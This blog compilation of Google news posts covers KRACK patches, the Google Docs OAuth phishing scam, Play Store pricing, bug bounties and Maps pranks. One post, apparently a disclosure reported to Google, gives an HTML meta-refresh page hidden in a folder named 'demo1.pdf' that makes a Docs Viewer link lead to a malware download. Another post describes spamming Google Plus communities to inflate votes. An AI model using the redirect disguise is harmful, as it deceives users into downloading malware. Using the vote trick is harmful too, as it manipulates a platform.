Google Patches KRACK Vulnerability in Android



Last month I wrote about how researchers broke Wi-Fi's most popular encryption, leaving millions of devices prone to the KRACK attack. KRACK is a serious flaw as it affects the WPA2 protocol.


But I have good news today. Tech giant Google has published this month's Android security bulletin, and the company provided a fix for the KRACK vulnerability that came to light last month.

The Android Security Bulletin for November 2017 is split into three separate packages: 2017-11-01, 2017-11-05, and 2017-11-06. The KRACK fixes are included in the last one, 2017-11-06.

If your phone receives the update and the security patch level is 2017-11-06, the KRACK fixes are also included.

Note that Microsoft silently deployed KRACK fixes to Windows users, without telling anyone, a month before the vulnerability became public. Apple released KRACK patches at the end of October, as part of iOS 11.1 and macOS High Sierra 10.13.1.

Google is in fact the last major vendor to release the fix for the KRACK vulnerability.

Details About The Attack


The bug, known as "KRACK" for Key Reinstallation Attack, exposes a fundamental flaw in WPA2, a common protocol used in securing most modern wireless networks. Mathy Vanhoef, a computer security academic, who found the flaw, said the weakness lies in the protocol's four-way handshake, which securely allows new devices with a pre-shared password to join the network.

That weakness can, at its worst, allow an attacker to decrypt network traffic from a WPA2-enabled device, hijack connections, and inject content into the traffic stream.

In other words: hackers can eavesdrop on your network traffic.

Beware of the big Google Docs scam - How to protect yourself



Did someone share a Google Doc with you? If yes, then you may well be one of the millions of internet users who became a victim of this scam campaign.

In the last few days a lot of people have been getting emails from people they know with a regular invitation to view a Google document, which says that the person [sender] "has shared a document on Google Docs with you." It might even appear to have been sent by one of your friends, family members, or colleagues, lulling you into a false sense of security.



Once you click the link, you will be redirected to a page which says, "Google Docs would like to read, send and delete emails, as well access to your contacts," asking your permission to "allow" access.

Now here is the catch. It’s a fake app that is named Google Docs, but it’s actually a guy named Eugene Pupov trying to trick you. Click the blue “Google Docs” link to get more info on the app.

Since the app will allow access to “manage your contacts” and “read, send, delete, and manage email”, it gives the attacker full access to your Inbox. It also allows the attacker to propagate the scam by sending the same email to all of your contacts.

In short, anything linked to a compromised Gmail account is potentially at risk, and even if you have enabled two-factor authentication, it would not prevent hackers from accessing your data, because you granted the app access yourself.

What to do if you've already fallen victim

If you have fallen victim to this scam, you need to remove the permissions given to the app.

 

  • Go to your Gmail account's permissions settings at https://myaccount.google.com and sign in.
  • Go to Security and Connected Apps.
  • Search for "Google Docs" in the list of connected apps and remove it. It's not the real Google Docs.
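
The same review can be done across many accounts at once. The following is an added example, not part of the original post: it flags grants where an app carries a Google product name while holding the mail and contacts access described above. The records are constructed and shaped like the token entries of the Google Workspace Admin SDK Directory API (clientId, displayText, scopes, userKey); the client IDs, the allowlist and the name list are hypothetical.

```python
# Scopes behind the consent text quoted above (real Google OAuth scope URLs).
HIGH_RISK_SCOPES = {
    "https://mail.google.com/": "read, send, delete and manage email",
    "https://www.googleapis.com/auth/contacts": "manage contacts",
}
# Product names a third-party app should not carry (illustrative list).
PROTECTED_NAMES = {"google docs", "google drive", "gmail"}
# Hypothetical allowlist of client IDs the organisation has verified.
TRUSTED_CLIENT_IDS = {"verified-client.apps.example"}


def normalise(name):
    """Lower-case and collapse whitespace so 'Google  Docs ' still matches."""
    return " ".join(name.lower().split())


def review_grant(grant):
    """Return the findings for one grant; an empty list means it looks fine."""
    if grant.get("clientId") in TRUSTED_CLIENT_IDS:
        return []
    findings = []
    if normalise(grant.get("displayText", "")) in PROTECTED_NAMES:
        findings.append("uses a Google product name")
    risky = sorted(s for s in grant.get("scopes", []) if s in HIGH_RISK_SCOPES)
    if risky:
        findings.append("can " + " and ".join(HIGH_RISK_SCOPES[s] for s in risky))
    return findings


def grants_to_revoke(grants):
    """Grants that carry a product name AND hold mailbox or contacts access."""
    return [(g["userKey"], g["clientId"]) for g in grants
            if len(review_grant(g)) == 2]


# Constructed sample grants (not real accounts or client IDs).
SAMPLE_GRANTS = [
    {"userKey": "alice@example.com", "clientId": "1111-constructed.apps.example",
     "displayText": "Google Docs",
     "scopes": ["https://mail.google.com/",
                "https://www.googleapis.com/auth/contacts"]},
    {"userKey": "bob@example.com", "clientId": "verified-client.apps.example",
     "displayText": "Google Docs",
     "scopes": ["https://www.googleapis.com/auth/drive"]},
    {"userKey": "carol@example.com", "clientId": "2222-constructed.apps.example",
     "displayText": "Mail Merge Helper", "scopes": ["https://mail.google.com/"]},
]

if __name__ == "__main__":
    for user, client in grants_to_revoke(SAMPLE_GRANTS):
        print("revoke", client, "for", user)
```

A grant with only one finding, such as the mail-merge tool in the sample, is worth a manual look rather than automatic revocation.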




Spreading malicious software via Google Docs Viewer



Google Docs is a word processor offered by Google within its Google Drive service. The suite allows users to create and edit documents online while collaborating with other users in real time. Documents can be shared, opened, and edited by multiple users simultaneously, and users are able to see character-by-character changes as other collaborators make edits.

Earlier, Google had a page that allowed users to quickly view documents online right from the browser. The Google Docs Viewer page was available at docs.google.com/viewer and drive.google.com/viewer. One could enter a document URL and Google generated a link to view it. This worked for a lot of file types: Microsoft Office files, PDFs, PostScript files and more.

This feature is no longer available; the page now shows a 404 error. While the page is gone, one can still use the Google Docs Viewer by supplying the document URL in the url parameter:

https://docs.google.com/viewer?url=[URL to pdf file]

For example

https://docs.google.com/viewer?url=https://bitcoin.org/bitcoin.pdf


The Flaw

I wondered what would happen if I gave it the URL of a website (say, a malicious one). For testing, I gave the URL of my site, and to my surprise it showed a 500 error.

https://docs.google.com/viewer?url=http://www.hackatrick.com


Next I entered a link to a .gif image to see if it would open or not, but I got a "No preview" error.


I also tried entering a link to a website with an open redirect flaw. I wanted to see if it would redirect to the site, but it ended up showing the HTML source code of the redirect page.


I realized that we cannot use an open redirect here, because if we use an open redirect and try to redirect the user, the viewer shows the HTML source code of the redirect page. The viewer shows the HTML source code if the URL ends with an .html extension, shows PDF files if the URL ends with a .pdf extension, and shows a 500 error if we enter a domain name.

My goal was to redirect the user to a site using a Google document. So I started thinking of an alternative way.

I created a directory on my website and named it demo1.pdf. Inside the directory I created an HTML file, named it index.html, and added the following code to it:

 <html>
<head>
<title>A web page that points a browser to a different page after 2 seconds</title>
<meta http-equiv="refresh" content="0; URL=[link to malicious software]">
<meta name="keywords" content="automatic redirection">
</head>
<body>
test
manually.
</body>
</html>

This code redirects index.html to a different site after a specified amount of time.

Now when I entered this URL in the Google document viewer site, Google thought it was a normal PDF file and not HTML, so it didn't show the HTML source code, and since there was no PDF, it showed a "No preview" message.



Now if a user gets this link, he will first see the URL, where it is clearly written as .pdf. Next he will wonder why, if it's a PDF file, it is not opening in the viewer. The third thing he will notice is the third-party apps suggested by Google to open the PDF. The user will have no clue that it's not actually a PDF file. So if the user clicks on the "View original" button at the top of the viewer page, the user will land in the /demo1.pdf directory, which has the HTML file that redirects to the malicious software link.

In Firefox it will show a popup with a save option, and in Chrome it will automatically start downloading.
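
A mail or web filter can catch this disguise by comparing what the URL claims with what the server returns. The following is an added example, not part of the original post: it extracts the target of a viewer link and flags a ".pdf" URL whose response lacks the PDF signature, has a non-PDF Content-Type, or contains a meta refresh. The host names and sample response are constructed, and the function names are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse


class MetaRefreshFinder(HTMLParser):
    """Collects the target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "meta" and attr.get("http-equiv", "").lower() == "refresh":
            # content has the form "0; URL=https://..."
            _, _, rest = attr.get("content", "").partition(";")
            key, _, target = rest.strip().partition("=")
            if key.strip().lower() == "url":
                self.targets.append(target.strip())


def viewer_target(link):
    """Return the url= parameter of a Google Docs Viewer link, else None."""
    parsed = urlparse(link)
    if parsed.hostname in ("docs.google.com", "drive.google.com") \
            and parsed.path == "/viewer":
        return parse_qs(parsed.query).get("url", [None])[0]
    return None


def inspect_response(url, content_type, body):
    """List the reasons a '.pdf' URL's response is not really a PDF."""
    findings = []
    if urlparse(url).path.rstrip("/").lower().endswith(".pdf"):
        if not body.lstrip().startswith(b"%PDF-"):
            findings.append("body lacks the %PDF- signature")
        if content_type.split(";")[0].strip().lower() != "application/pdf":
            findings.append("Content-Type is " + content_type)
    finder = MetaRefreshFinder()
    finder.feed(body.decode("utf-8", "replace"))
    findings += ["meta refresh to " + t for t in finder.targets]
    return findings


# Constructed response for a directory named demo1.pdf that serves index.html.
SAMPLE_URL = "http://site.example/demo1.pdf/"
SAMPLE_BODY = (b'<html><head><meta http-equiv="refresh" '
               b'content="0; URL=https://download.example/file"></head>'
               b'<body>test</body></html>')

if __name__ == "__main__":
    for reason in inspect_response(SAMPLE_URL, "text/html", SAMPLE_BODY):
        print(reason)
```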


I have reported the flaw to the Google security team, but unfortunately this flaw does not come under their bug bounty program as they don't consider it to be a valid vulnerability. It does not matter, though, as the fun and the learning are more important. Google thanked me for informing them about the issue and they will fix it soon. Hopefully!!

Google Play Store paid applications now from INR 10




Apple leads, Google follows—much to the delight of Indian mobile application developers and users.

First, Apple made mobile applications available for as low as INR 10. Now, Google has done the same: Google Play apps are now available for INR 10 (earlier the minimum price was INR 50).

Why has Google slashed the minimum price?


Google actually didn’t have a choice. It could either join Apple or risk getting left behind in the Indian mobile application market.

A few weeks back, Apple introduced a multitier price system for its Indian App Store. One of the highlights was the minimum price tag on the applications. Developers could now price their applications at INR 10.

Taking the cue from its Cupertino-based counterpart, Google also decided to reduce the minimum price. While earlier a user had to shell out a minimum of INR 50 to enjoy a paid application in the Google Play store, now he can access it for only INR 10.

The reason why Apple, and now Google, has lowered the price is actually pretty simple. India is a big country with a big population, and with a good part of the population falling in the age bracket that uses mobile applications most, the potential in the mobile app niche is stupendous. As most, if not all, Indian buyers are price conscious, both these giants are hoping to exponentially increase the number of downloads by lowering the minimum price (and this is by no means an unrealistic estimation).

What does the news mean for developers and gamers?

Earlier, developers listing applications in Google Play India had two options:

  • To provide their applications for free and charge through in-application purchases
  • To list a price of INR 50 or more on their applications, even after knowing that many users will not easily part with that kind of money to buy their games

However, now developers can price their apps at INR 10, an amount which most gamers will not find high. So, basically, the price slash will help developers reach out to more people. It also makes testing new applications easier. First-time developers too will now find it easier to enter the mobile application market.
Gamers, on the other hand, can now enjoy their favorite games without worrying too much about the price factor.

What else is Google doing to entice more users?

Google realizes the Indian audience is unique. That’s why it has recently started selling Google Play Prepaid Vouchers (also known as Google Play Gift Cards).

Something like this won’t have much impact in most countries, at least not in the developed countries. However, in India, where a substantial number of people are still not comfortable making electronic payments, this is a good move.

Google Play Prepaid Vouchers, available in different denominations, can be bought online as well as offline. With these vouchers, just like the price slash, Google plans to attract more customers to its fold.

That both these strategies will make an impact in the immediate future is pretty clear. The only question is how much.


About The Author 

Vaishnavi Agrawal loves pursuing excellence through writing and has a passion for technology. She has successfully managed and run personal technology magazines and websites. She currently writes for intellipaat.com, a global training company that provides e-learning and professional certification training.

 


Google Launches Bug Bounty Program For Android




Google, the tech giant that always rewards security researchers for finding flaws in its services, announced the launch of a security rewards program for Android at Black Hat’s Mobile Security Summit in London. As of now, though, the Android program will only cover vulnerabilities that affect Nexus phones and tablets available for sale in the Google Play Store. Right now, that’s the Nexus 6 phone and Nexus 9 tablet.

Rewards start at $500 for reporting moderately severe vulnerabilities and go up to $8,000 for researchers who report a critical bug, provide a test case and submit a patch. On top of that, Google will offer up to an additional $30,000 for exploits that can compromise TrustZone or Verified Boot (and slightly smaller rewards up to $10,000 and $20,000 for attacks from installed apps and remote or proximal attacks).

With the launch of the Android Security Rewards Program, Google aims to encourage the work of security researchers in making Android more secure. If you are a hacker or a security researcher looking to join the hunt, you can browse all the detailed info right here.

What do you think about this reward initiative by Google? Are the efforts enough to help make Android more “secure”? Let us know your thoughts in the comments below!

Get Unlimited Google Plus Votes to your Blog Posts for Free



After so many updates and changes made by Google to its SERP ranking system, it has become hard for bloggers and other professionals to get a good rank in Google and get good traffic. In order to get a good rank from Google, you not only have to write a good article but also maintain good social strength for it.

Whenever we write an article on our website, we usually share it on all of our social profiles to get likes, shares, upvotes, etc. But sharing does not guarantee that we will get a good response from people. In this post I will share a trick by which one can get unlimited Google Plus votes for blog posts for free.

Before learning about the trick, first add a social sharing widget to your blog. There are many free widgets like Sharethis and Addthis which you can add to your blog.


Google+ is a part of Google, so Google considers it higher than other social networking sites like Facebook, Twitter, etc. So in order to get good social strength, one must get a good response from Google+.

Here are the steps to get unlimited Google Plus votes for your blog posts.

The trick is very simple and does not require much time. It does not require any software or any complex method.

Get Google+ votes

The first step is to get Google+ votes, and in order to do so, join Communities. There are lots of popular communities in Google+ with a huge number of members. Join them all.

Join almost 20-30 communities, and also join a few communities which are related to your blogging niche.


The Main Trick

  • Now, after joining Google+ communities, here is the main trick to get unlimited Google Plus votes for your blog posts.

  • Go to Google Images and download a few images related to technology, famous quotes, funny pics, etc.

  • Now go to the communities that you joined and upload any of the images that you have downloaded. In the post section, put the link to your blog post and share it. Do the same in all the communities.



Now you will start getting a good number of Google+ votes on your blog post. What exactly happens is that each time someone in the community votes for your post, you automatically get a vote for your blog post too.






Google Maps abused again, Searching the N-Word Produces White House


Google maps shows white house as N***** House


Last month a small patch of terrain in Google Maps just south of the Pakistani city of Rawalpindi was found to contain a bizarre image of the Android robot urinating on the Apple logo.



The image seems to have been user generated through the Map Maker function, which allows users to contribute local knowledge to Google Maps. In this case, that meant the suspiciously shaped pattern of grass appeared in Maps without Google realizing the meaning behind it. "We’re sorry for this inappropriate user-created content," Google said in a statement to The Washington Post. "We’re working to remove it quickly."





After this embarrassing oversight, Google shut down its Map Maker service. The company said it had been moderating all user-generated edits to try to prevent such pranks, but found it impossible to keep up.

But it seems that even after Google removed the Map Maker service, someone still managed to play yet another prank on Google Maps, and this time they abused the Add Place feature. Someone has added 'N****s House' at the White House of the United States. Whenever a user types 'N****s House' in the Google Maps search box, it shows the White House. At the time of writing it was, surprisingly, still live.




Google should take steps to fix it soon and come up with an effective solution to prevent such pranks in the future.

Android M to include more privacy controls for users



Privacy has been a great issue among Android users. According to Bloomberg, Google is reportedly looking to give users more granular control over app permissions.

According to Bloomberg, the new operating system, set to debut at Google I/O 2015, will let users pick and choose what information is shared with certain applications, including photos, contacts, and location. This is an evolution in Google's walk to bring more privacy and peace of mind to its users. That means you’ll be able to set whether an app (Facebook, for example) can access information such as photos, contacts and location.

It’s unclear how the new features will affect the functionality of an app, because a few permissions are necessary for some apps, and if those permissions are not granted, apps might not work the way they are supposed to work. This new option will presumably cause some strife between Google and developers, who feed off that information.


We’re expecting to hear more about Android M at Google I/O, which kicks off on May 28.

Google sets up People Finder for Nepal earthquake 2015

The devastating earthquake that struck Nepal earlier today has left around 600 people dead and many more injured. But the worst part is that there are a lot of people who are still missing.

So Google has updated its Google Person Finder to help out with rescue operations.




Wikipedia states that GPF provides a registry and message board for survivors, family, and loved ones affected by a natural disaster to post and search for information about each other's status and whereabouts. It was created by volunteer Google engineers in response to the 2010 Haiti earthquake.

GPF has two features:

1. It helps you search for missing people.

2. In case you have any relevant information about someone, it helps you update their status and location.

 

In case you're looking for a missing person, you too can avail of the help of Google Person Finder.

Source: scoopwhoop.com